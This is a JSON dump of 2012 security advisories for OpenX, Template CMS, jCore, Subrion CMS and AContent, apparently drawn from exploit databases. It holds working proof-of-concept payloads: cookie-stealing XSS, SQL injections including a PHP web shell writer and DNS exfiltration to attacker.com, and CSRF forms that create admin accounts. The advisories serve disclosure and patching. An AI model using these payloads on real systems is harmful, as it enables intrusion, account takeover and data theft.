References. \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/117459/atutoracontent-sqlxss.txt"}, {"lastseen": "2016-12-05T22:16:13", "references": [], "edition": 1, "description": "", "reporter": "High-Tech Bridge SA", "published": "2012-10-11T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "type": "packetstorm", "title": "OpenX 2.8.10 Cross Site Scripting / SQL Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-4990", "CVE-2012-4989"], "modified": "2012-10-11T00:00:00", "href": "https://packetstormsecurity.com/files/117284/OpenX-2.8.10-Cross-Site-Scripting-SQL-Injection.html", "id": "PACKETSTORM:117284", "sourceData": "`Advisory ID: HTB23116 \nProduct: OpenX \nVendor: OpenX \nVulnerable Version(s): 2.8.10 and probably prior \nTested Version: 2.8.10 \nVendor Notification: September 19, 2012 \nPublic Disclosure: October 10, 2012 \nVulnerability Type: Cross-Site Scripting [CWE-79], SQL Injection [CWE-89] \nCVE References: CVE-2012-4989, CVE-2012-4990 \nCVSSv2 Base Scores: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N), 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P) \nSolution Status: Fixed by Vendor \nRisk Level: Medium \nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \n \n----------------------------------------------------------------------------------------------- \n \nAdvisory Details: \n \nHigh-Tech Bridge Security Research Lab discovered multiple vulnerabilities in OpenX, which can be exploited to perform Cross-Site Scripting (XSS) and SQL Injection attacks. \n \n \n1) Cross-Site Scripting (XSS) in OpenX: CVE-2012-4989 \n \nInput passed via the \"parent\" GET parameter to /www/admin/plugin-index.php is not properly sanitised before being returned to the user. \nThis can be exploited to execute arbitrary HTML and script code in administrator's browser session in context of an affected website. \n \nThe following PoC (Proof of Concept) demonstrates the vulnerability: \n \nhttp://[host]/www/admin/plugin-index.php?action=info&group=vastInlineBannerTypeHtml&parent=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E \n \n \n2) SQL Injection in OpenX: CVE-2012-4990 \n \nInput passed via the \"ids[]\" POST parameter to /www/admin/campaign-zone-link.php is not properly sanitised before being used in SQL query. \nThis can be exploited to manipulate SQL queries by injecting arbitrary SQL code. \n \nThe following PoC demonstrates the vulnerability: \n \n \n<form action=\"http://[host]/www/admin/campaign-zone-link.php\" method=\"post\"> \n<input type=\"hidden\" name=\"action\" value='link' /> \n<input type=\"hidden\" name=\"ids[]\" value=\"z1)) OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))) -- \" /> \n<input type=\"hidden\" name=\"clientid\" value='[CLIENT_ID]' /> \n<input type=\"hidden\" name=\"campaignid\" value='[CAMPAIGN_ID]' /> \n<input type=\"hidden\" name=\"\" value='' /> \n<input type=\"hidden\" name=\"\" value='' /> \n<input type=\"hidden\" name=\"\" value='' /> \n<input type=\"hidden\" name=\"\" value='' /> \n<input type=\"submit\" id=\"btn\"> \n</form> \n \n \nSuccessful exploitation of this vulnerability requires attacker to be registered, logged-in and have permission to access link zone. \n \n \n----------------------------------------------------------------------------------------------- \n \nSolution: \n \nFixed in SVN repository, revision 81823 \n \nReplace next files: \n[CWE-79] https://svn.openx.org/openx/trunk/lib/templates/admin/plugin-group-view.html \n[CWE-89] https://svn.openx.org/openx/trunk/www/admin/campaign-zone-link.php \n \n----------------------------------------------------------------------------------------------- \n \nReferences: \n \n[1] High-Tech Bridge Advisory HTB23116 - https://www.htbridge.com/advisory/HTB23116 - Multiple vulnerabilities in OpenX. \n[2] OpenX - http://www.openx.com - Open source ad serving platform for publishers. \n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures. \n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \n \n----------------------------------------------------------------------------------------------- \n \nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/117284/openx-sqlxss.txt", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-12-05T22:12:03", "references": [], "edition": 1, "description": "", "reporter": "High-Tech Bridge SA", "published": "2012-10-03T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "type": "packetstorm", "title": "Template CMS 2.1.1 Cross Site Request Forgery / Cross Site Scripting", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-4901", "CVE-2012-4902"], "modified": "2012-10-03T00:00:00", "href": "https://packetstormsecurity.com/files/117104/Template-CMS-2.1.1-Cross-Site-Request-Forgery-Cross-Site-Scripting.html", "id": "PACKETSTORM:117104", "sourceData": "`Advisory ID: HTB23115 \nProduct: Template CMS \nVendor: template-cms.ru \nVulnerable Version(s): 2.1.1 and probably prior \nTested Version: 2.1.1 \nVendor Notification: September 12, 2012 \nPublic Disclosure: October 3, 2012 \nVulnerability Type: Cross-Site Scripting [CWE-79], Cross-Site Request Forgery [CWE-352] \nCVE References: CVE-2012-4901, CVE-2012-4902 \nCVSSv2 Base Scores: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N), 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C) \nRisk Level: High \nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \n \n----------------------------------------------------------------------------------------------- \n \nAdvisory Details: \n \nHigh-Tech Bridge Security Research Lab discovered multiple vulnerabilities in Template CMS, which can be exploited to perform Cross-Site Scripting (XSS) and \u0421ross-Site Request Forgery (CSRF) attacks. \n \n \n1) Cross-Site Scripting (XSS) in Template CMS: CVE-2012-4901 \n \nInput passed via the \"themes_editor\" POST parameter to /admin/index.php is not properly sanitised before being returned to the user. \nThis can be exploited to execute arbitrary HTML and script code in administrator's browser session in context of an affected website. \n \n \nThe following PoC (Proof of Concept) demonstrates the vulnerability: \n \n \n<form action=\"http://[host]/admin/index.php?action=add_template&id=themes\" method=\"post\"> \n<input type=\"hidden\" name=\"themes_editor\" value='</textarea><script>alert(document.cookie);</script>' /> \n<input type=\"hidden\" name=\"themes_editor_name\" value='' /> \n<input type=\"hidden\" name=\"add_template\" value='' /> \n<input type=\"submit\" id=\"btn\"> \n</form> \n \n \n \n2) \u0421ross-Site Request Forgery (CSRF) in Template CMS: CVE-2012-4902 \n \nThe application allows authorized administrator to perform certain actions via HTTP requests without making proper validity checks to verify the source of the requests. This can be exploited to add, delete or modify sensitive information, for example to create new administrator or execute arbitrary PHP code. \n \nAn attacker has to trick a logged-in administrator to visit a malicious web page containing the following code that will add a new administrator to the CMS: \n \n \n<form action=\"http://[host]/admin/index.php?id=system&sub_id=users&action=add\" method=\"post\"> \n<input type=\"hidden\" name=\"login\" value='newadmin' /> \n<input type=\"hidden\" name=\"password\" value='password' /> \n<input type=\"hidden\" name=\"email\" value='newadmin@mail.com' /> \n<input type=\"hidden\" name=\"role\" value='admin' /> \n<input type=\"hidden\" name=\"register\" value='' /> \n<input type=\"submit\" id=\"btn\"> \n</form> \n<script> \ndocument.getElementById('btn').click(); \n</script> \n \n \n \nThe second PoC adds arbitrary PHP code (phpinfo() in our case) into CMS's page: \n \n \n<form action=\"http://[host]/admin/index.php?id=themes&action=edit_template&file=aboutTemplate.php\" method=\"post\"> \n<input type=\"hidden\" name=\"themes_editor_name\" value='about' /> \n<input type=\"hidden\" name=\"themes_editor\" value='<? phpinfo(); ?>' /> \n<input type=\"hidden\" name=\"old_name\" value=\"about\" /> \n<input type=\"hidden\" name=\"edit_template\" value='' /> \n<input type=\"submit\" id=\"btn\"> \n</form> \n<script> \ndocument.getElementById('btn').click(); \n</script> \n \n \nThe phpinfo() function will be executed [if allowed by web server configuration] on the following web page: \n \nhttp://[vulnerable_host]/about \n \n \n \n----------------------------------------------------------------------------------------------- \n \nReferences: \n \n[1] High-Tech Bridge Advisory HTB23115 - https://www.htbridge.com/advisory/HTB23115 - Multiple vulnerabilities in Template CMS. \n[2] Template CMS - http://template-cms.ru - Template CMS is a fast and simple content management system written in PHP. \n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures. \n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \n \n----------------------------------------------------------------------------------------------- \n \nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/117104/templatecms-xssxsrf.txt", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-12-05T22:19:35", "references": [], "edition": 1, "description": "", "reporter": "High-Tech Bridge SA", "published": "2012-10-18T00:00:00", "type": "packetstorm", "title": "jCore 1.0pre Cross Site Scripting / SQL Injection", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2012-4232", "CVE-2012-4231"], "modified": "2012-10-18T00:00:00", "href": "https://packetstormsecurity.com/files/117461/jCore-1.0pre-Cross-Site-Scripting-SQL-Injection.html", "id": "PACKETSTORM:117461", "sourceData": "`Advisory ID: HTB23107 \nProduct: jCore \nVendor: jcore.net \nVulnerable Version(s): 1.0pre and probably prior \nTested Version: 1.0pre \nVendor Notification: August 1, 2012 \nPublic Disclosure: October 17, 2012 \nVulnerability Type: SQL Injection [CWE-89], Cross-Site Scripting [CWE-79] \nCVE References: CVE-2012-4231, CVE-2012-4232 \nCVSSv2 Base Scores: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P), 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N) \nSolution Status: Fixed by Vendor \nRisk Level: High \nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \n \n----------------------------------------------------------------------------------------------- \n \nAdvisory Details: \n \nHigh-Tech Bridge Security Research Lab discovered multiple vulnerabilities in jCore, which can be exploited to perform Cross-Site Scripting (XSS) and SQL Injection attacks. \n \n \n1) SQL Injection in jCore: CVE-2012-4232 \n \n1.1 Input passed via the \"memberloginid\" COOKIE parameter to /admin/index.php is not properly sanitised before being used in SQL query. \nThis can be exploited to manipulate SQL queries by injecting arbitrary SQL code. \n \nThe PoC code below is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) subdomain of \".attacker.com\" (a domain name, DNS server of which is controlled by the attacker): \n \n \nGET /admin/?logout=1 HTTP/1.1 \nCookie: memberloginid=' OR 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- \n \n \n \n2) Cross-Site Scripting (XSS) in jCore: CVE-2012-4231 \n \n2.1 Input passed via the \"path\" GET parameter to /admin/index.php is not properly sanitised before being returned to the user. \nThis can be exploited to execute arbitrary HTML and script code in user's browser session in context of affected website. \n \nThe following PoC demonstrates the vulnerability: \n \nhttp://[host]/admin/?path=%27%20onmouseover%3dalert%28document.cookie%29%20%27 \n \n----------------------------------------------------------------------------------------------- \n \nSolution: \n \nAs a temporary solution upgrade to version 1.0pre2: \nhttp://jcore.net/news/jcore-ver-10pre2-available-for-testing \n \nFinal fix will be available in version 1.0 soon. \n \n----------------------------------------------------------------------------------------------- \n \nReferences: \n \n[1] High-Tech Bridge Advisory HTB23107 - https://www.htbridge.com/advisory/HTB23107 - Multiple vulnerabilities in jCore. \n[2] jCore - http://jcore.net/ - jCore is a free and open source content management system (CMS) written in PHP and distributed under the GNU General Public License. \n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures. \n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \n \n----------------------------------------------------------------------------------------------- \n \nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/117461/jcore-sqlxss.txt"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:46", "references": [], "description": "\r\n\r\nAdvisory ID: HTB23113\r\nProduct: Subrion CMS\r\nVendor: The Subrion development team\r\nVulnerable Version(s): 2.2.1 and probably prior\r\nTested Version: 2.2.1\r\nVendor Notification: September 5, 2012 \r\nPublic Disclosure: October 17, 2012 \r\nVulnerability Type: SQL Injection [CWE-89], Cross-Site Scripting [CWE-79], Cross-Site Request Forgery [CWE-352]\r\nCVE References: CVE-2012-4771, CVE-2012-4772, CVE-2012-4773\r\nCVSSv2 Base Scores: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P), 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N), 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P)\r\nSolution Status: Fixed by Vendor\r\nRisk Level: High \r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered multiple vulnerabilities in Subrion CMS, which can be exploited to perform Cross-Site Scripting (XSS), SQL Injection and \u0421ross-Site Request Forgery (CSRF) attacks.\r\n\r\n\r\n1) SQL Injection in Subrion CMS: CVE-2012-4772\r\n\r\nInput passed via the "plan_id" POST parameter to /register/ URL (modified by mod_rewrite to /system.php script) is not properly sanitised before being used in SQL query.\r\nThis can be exploited to manipulate SQL queries by injecting arbitrary SQL code.\r\n\r\nThe following PoC (Proof of Concept) demonstrates the vulnerability:\r\n\r\n\r\n<form action="http://[host]/register/" method="post">\r\n<input type="hidden" name="username" value='username' />\r\n<input type="hidden" name="fullname" value='fullname' />\r\n<input type="hidden" name="email" value='username@mail.com' />\r\n<input type="hidden" name="password" value='password' />\r\n<input type="hidden" name="password2" value='password' />\r\n<input type="hidden" name="security_code" value='[CAPTCHA]' />\r\n<input type="hidden" name="plan_id" value="0 UNION SELECT '<? system($cmd); ?>',1,1,1,1,1,1,1,1,1,1,1,1,1 INTO OUTFILE '../../../path/to/site/file.php'" />\r\n<input type="hidden" name="register" value="" />\r\n<input type="submit" id="btn">\r\n</form>\r\n\r\n\r\nDepending on web and SQL servers configuration, the above-mentioned PoC code creates a simple PHP shell on the vulnerable system. \r\n\r\n\r\n2) Cross-Site Scripting (XSS) in Subrion CMS: CVE-2012-4771\r\n\r\n2.1 Input passed via the "f[accounts][fullname]" and "f[accounts][username]" GET parameters to /advsearch/ URL (modified by mod_rewrite to /system.php script) is not properly sanitised before being returned to the user.\r\nThis can be exploited to execute arbitrary HTML and script code in user's browser session in context of an affected website.\r\n\r\nThe following PoC demonstrates the vulnerability:\r\n\r\n\r\n<form action="http://[host]/advsearch/" method="post">\r\n<input type="hidden" name="items[]" value='accounts' />\r\n<input type="hidden" name="f[accounts][fullname]" value='"><script>alert(document.cookie);</script>' />\r\n<input type="hidden" name="f[accounts][username]" value='"><script>alert(document.cookie);</script>' />\r\n<input type="hidden" name="q" value='' />\r\n<input type="submit" id="btn">\r\n</form>\r\n\r\n\r\n2.2 Input passed via the "id" and "group" GET parameters to multiple files is not properly sanitised before being returned to the user.\r\nThis can be exploited to execute arbitrary HTML and script code in administrator's browser session in context of an affected website.\r\n\r\nThe following PoCs demonstrate the vulnerabilities:\r\n\r\nhttp://[host]/admin/accounts/edit/?id=1%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E\r\nhttp://[host]/admin/configuration/?group=1%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E\r\nhttp://[host]/admin/manage/fields/edit/?id=1%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E\r\nhttp://[host]/admin/manage/blocks/edit/?id=1%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E\r\n\r\n\r\n3) \u0421ross-Site Request Forgery (CSRF) in Subrion CMS: CVE-2012-4773\r\n\r\nThe application allows authorized administrator to perform certain actions via HTTP requests without making proper validity checks to verify the source of the requests. This can be exploited to add, delete or modify sensitive information, for example to create new administrator or execute arbitrary SQL code.\r\n\r\nAn attacker should make logged-in administrator open a malicious link in the browser to exploit this vulnerability.\r\n\r\nThe following PoC creates administrative account within application:\r\n\r\n\r\n<form action="http://[host]/admin/accounts/add/" method="post">\r\n<input type="hidden" name="username" value='new_admin' />\r\n<input type="hidden" name="fullname" value='new_admin' />\r\n<input type="hidden" name="email" value='new_admin@mail.com' />\r\n<input type="hidden" name="usergroup" value='1' />\r\n<input type="hidden" name="status" value='active' />\r\n<input type="hidden" name="_password" value='_password' />\r\n<input type="hidden" name="_password2" value='_password' />\r\n<input type="hidden" name="save" value="Add" />\r\n<input type="submit" id="btn">\r\n</form>\r\n<script>\r\ndocument.getElementById('btn').click();\r\n</script>\r\n\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nUpgrade to Subrion 2.2.3\r\n\r\nMore Information:\r\nhttp://www.subrion.com/forums/announcements/934-subrion-2-2-3-open-source-cms-core-available.html\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nReferences:\r\n\r\n[1] High-Tech Bridge Advisory HTB23113 - https://www.htbridge.com/advisory/HTB23113 - Multiple vulnerabilities in Subrion CMS.\r\n[2] Subrion CMS - http://www.subrion.com/ - Subrion CMS is a stand-alone PHP content management system that is very easy to use. It comes with a ton of great features including full source editing, per-page permissions, user activity monitoring, and much more.\r\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures.\r\n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nDisclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2012-10-22T00:00:00", "title": "Multiple vulnerabilities in Subrion CMS", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:46", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2012-4771", "CVE-2012-4772", "CVE-2012-4773"], "modified": "2012-10-22T00:00:00", "id": "SECURITYVULNS:DOC:28647", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28647", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:46", "references": [], "description": "\r\n\r\nAdvisory ID: HTB23117\r\nProduct: AContent\r\nVendor: ATutor\r\nVulnerable Version(s): 1.2 and probably prior\r\nTested Version: 1.2\r\nVendor Notification: September 26, 2012 \r\nPublic Disclosure: October 17, 2012 \r\nVulnerability Type: SQL Injection [CWE-89], Improper Authentication [CWE-287], Cross-Site Scripting [CWE-79]\r\nCVE References: CVE-2012-5167, CVE-2012-5168, CVE-2012-5169\r\nCVSSv2 Base Scores: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P), 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P), 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)\r\nSolution Status: Fixed by Vendor\r\nRisk Level: High \r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered multiple vulnerabilities in AContent, which can be exploited to bypass authentication and to perform Cross-Site Scripting (XSS) and SQL Injection attacks.\r\n\r\n\r\n1) SQL Injection in AContent: CVE-2012-5167\r\n\r\n1.1 The vulnerability exists due to insufficient sanitation of input data in the "field" HTTP POST parameter in /course_category/index_inline_editor_submit.php. A remote unauthenticated user can execute arbitrary SQL commands in application`s database. \r\n\r\nThe following PoC (Proof of Concept) demonstrates the vulnerability:\r\n\r\n\r\n<form action="http://[host]/course_category/index_inline_editor_submit.php" method="post">\r\n<input type="hidden" name="field" value="category_name-1 AND 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2)))" />\r\n<input type="hidden" name="value" value="1" />\r\n<input type="submit" id="btn">\r\n</form>\r\n\r\n\r\n1.2 The vulnerability exists due to insufficient sanitation of input data in the "field" HTTP POST parameter in /user/index_inline_editor_submit.php. A remote unauthenticated user can execute arbitrary SQL commands in application`s database. \r\n\r\nThe following PoC (Proof of Concept) demonstrates the vulnerability:\r\n\r\n<form action="http://[host]/user/index_inline_editor_submit.php" method="post">\r\n<input type="hidden" name="field" value="password=((select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))))-1" />\r\n<input type="hidden" name="value" value="1" />\r\n<input type="submit" id="btn">\r\n</form>\r\n\r\n\r\n1.3 Input passed via the "id" GET parameter to /user/user_password.php in POST request is not properly sanitised before being used in SQL query.\r\nThis can be exploited to manipulate SQL queries by injecting arbitrary SQL code.\r\n\r\nThe following PoC (Proof of Concept) demonstrates the vulnerability: \r\n\r\n\r\n<form action="http://[host]/user/user_password.php?id=1' AND 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a%2b1)%252)))%20--%20" method="post">\r\n<input type="hidden" name="submit" value="1" />\r\n<input type="submit" id="btn">\r\n</form>\r\n\r\n\r\nSuccessful exploitation of vulnerability 1.3 requires attacker to be registered and logged-in.\r\n\r\n\r\n2) Improper Authentication in AContent: CVE-2012-5168\r\n\r\n2.1 The vulnerability exists due to absent authentication in the "/user/index_inline_editor_submit.php" script. A remote unauthorized attacker can change users' passwords.\r\n\r\nThe following example will change password for user with id=1 to 'password'.\r\n\r\n\r\n<form action="http://[host]/user/index_inline_editor_submit.php" method="post">\r\n<input type="hidden" name="field" value="password-1" />\r\n<input type="hidden" name="value" value="5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8" />\r\n<input type="submit" id="btn">\r\n</form>\r\n\r\n\r\n2.2 The vulnerability exists due to absent authentication in the "/course_category/index_inline_editor_submit.php" script. A remote unauthorized attacker can modify names for existing categories.\r\n\r\nThe following example will change category name with id=1 to 'new_category':\r\n\r\n\r\n<form action="http://[host]/course_category/index_inline_editor_submit.php" method="post">\r\n<input type="hidden" name="field" value="category_name-1" />\r\n<input type="hidden" name="value" value="new_category" />\r\n<input type="submit" id="btn">\r\n</form>\r\n\r\n\r\n\r\n3) Cross-Site Scripting (XSS) in AContent: CVE-2012-5169\r\n\r\nInput passed via the HTTP GET parameters "pathext", "popup", "framed", and "file" to /file_manager/preview_top.php is not properly sanitised before being returned to the user.\r\nThis can be exploited to execute arbitrary HTML and script code in user's browser session in context of an affected website.\r\n\r\nThe following PoCs (Proof of Concept) demonstrate the vulnerabilities:\r\n\r\nhttp://[host]/file_manager/preview_top.php?pathext=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E\r\nhttp://[host]/file_manager/preview_top.php?popup=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E\r\nhttp://[host]/file_manager/preview_top.php?framed=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E\r\nhttp://[host]/file_manager/preview_top.php?file=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E\r\n\r\n\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nUsers should apply patches #1 and #2 using the AContent Administrator's Updater tool\r\n\r\nMore Information:\r\nhttp://update.atutor.ca/acontent/patch/1_2/\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nReferences:\r\n\r\n[1] High-Tech Bridge Advisory HTB23117 - https://www.htbridge.com/advisory/HTB23117 - Multiple vulnerabilities in AContent.\r\n[2] AContent - http://atutor.ca - AContent is an open source learning content authoring system and respository used to create interoperable, accessible, adaptive Web-based learning content.\r\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures.\r\n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nDisclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2012-10-22T00:00:00", "title": "Multiple vulnerabilities in AContent", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:46", "vector": "NONE", "value": 6.8}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2012-5167", "CVE-2012-5168", "CVE-2012-5169"], "modified": "2012-10-22T00:00:00", "id": "SECURITYVULNS:DOC:28646", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28646", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:46", "references": [], "description": "\r\n\r\nAdvisory ID: HTB23107\r\nProduct: jCore\r\nVendor: jcore.net\r\nVulnerable Version(s): 1.0pre and probably prior\r\nTested Version: 1.0pre \r\nVendor Notification: August 1, 2012 \r\nPublic Disclosure: October 17, 2012 \r\nVulnerability Type: SQL Injection [CWE-89], Cross-Site Scripting [CWE-79]\r\nCVE References: CVE-2012-4231, CVE-2012-4232\r\nCVSSv2 Base Scores: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P), 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)\r\nSolution Status: Fixed by Vendor\r\nRisk Level: High \r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered multiple vulnerabilities in jCore, which can be exploited to perform Cross-Site Scripting (XSS) and SQL Injection attacks.\r\n\r\n\r\n1) SQL Injection in jCore: CVE-2012-4232\r\n\r\n1.1 Input passed via the "memberloginid" COOKIE parameter to /admin/index.php is not properly sanitised before being used in SQL query.\r\nThis can be exploited to manipulate SQL queries by injecting arbitrary SQL code.\r\n\r\nThe PoC code below is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) subdomain of ".attacker.com" (a domain name, DNS server of which is controlled by the attacker):\r\n\r\n\r\nGET /admin/?logout=1 HTTP/1.1\r\nCookie: memberloginid=' OR 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- \r\n\r\n\r\n\r\n2) Cross-Site Scripting (XSS) in jCore: CVE-2012-4231\r\n\r\n2.1 Input passed via the "path" GET parameter to /admin/index.php is not properly sanitised before being returned to the user.\r\nThis can be exploited to execute arbitrary HTML and script code in user's browser session in context of affected website.\r\n\r\nThe following PoC demonstrates the vulnerability:\r\n\r\nhttp://[host]/admin/?path=%27%20onmouseover%3dalert%28document.cookie%29%20%27\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nAs a temporary solution upgrade to version 1.0pre2:\r\nhttp://jcore.net/news/jcore-ver-10pre2-available-for-testing\r\n\r\nFinal fix will be available in version 1.0 soon.\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nReferences:\r\n\r\n[1] High-Tech Bridge Advisory HTB23107 - https://www.htbridge.com/advisory/HTB23107 - Multiple vulnerabilities in jCore.\r\n[2] jCore - http://jcore.net/ - jCore is a free and open source content management system (CMS) written in PHP and distributed under the GNU General Public License.\r\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures.\r\n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. 